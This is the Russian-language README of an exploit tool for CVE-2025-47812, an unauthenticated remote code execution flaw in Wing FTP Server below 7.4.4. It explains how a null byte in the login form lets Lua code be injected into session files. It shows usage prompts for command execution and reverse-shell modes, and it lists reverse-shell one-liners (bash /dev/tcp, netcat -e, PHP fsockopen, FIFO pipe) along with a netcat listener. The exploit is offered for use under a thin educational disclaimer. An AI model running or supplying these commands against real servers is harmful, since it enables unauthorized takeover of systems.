
Эксплойт неаутентифицированного удаленного выполнения кода для Wing FTP Server < 7.4.4, обеспечивающий выполнение команд и обратные оболочки через Lua-инъекцию в файлах сеансов.
CVE-2025-47812 - Удаленное выполнение кода (RCE) в Wing FTP Server
===========================================================
Автор: blindma1den
Дата: июль 2025
Тип эксплойта: Удаленное выполнение кода (без аутентификации)
Цель: Wing FTP Server < 7.4.4
Оценка CVSS: 10.0 (критическая)
Этот скрипт эксплуатирует CVE-2025-47812 — критическую уязвимость в веб-интерфейсе Wing FTP Server, которая позволяет удаленным злоумышленникам выполнять произвольные системные команды или открывать reverse shell без аутентификации.
Недостаток вызван некорректной обработкой нулевых байтов (%00)
в форме входа (/loginok.html). Это позволяет внедрить Lua-код
в файлы сессий, которые позже выполняются при обращении
к таким конечным точкам, как /dir.html.
Описание NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-47812
whoami, uname -a)Установка зависимостей:
pip install requests
Запустите скрипт:
python3 wingftp_rce_exploit.py
Вас попросят указать:
[1] ВЫПОЛНЕНИЕ КОМАНДЫ:
Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 1
Command to execute (default: whoami): whoami
[2] REVERSE SHELL:
Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 2
Reverse shell IP address: 192.168.1.100
Reverse shell port: 4444
Запустите свой listener перед активацией shell:
nc -lvnp 4444
Bash: bash -i >& /dev/tcp/IP/PORT 0>&1
Python3: python3 -c 'import socket,subprocess,os; ...'
Netcat: nc IP PORT -e /bin/sh
PHP: php -r '$sock=fsockopen("IP",PORT); ...'
FIFO + Netcat: rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i ...
Этот код предназначен только для образовательных целей. НЕ используйте данный эксплойт против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения. Несанкционированное использование незаконно и неэтично.
Немедленно обновите свои системы. Wing FTP Server 7.4.4 устраняет данную уязвимость.
Удачного хакинга!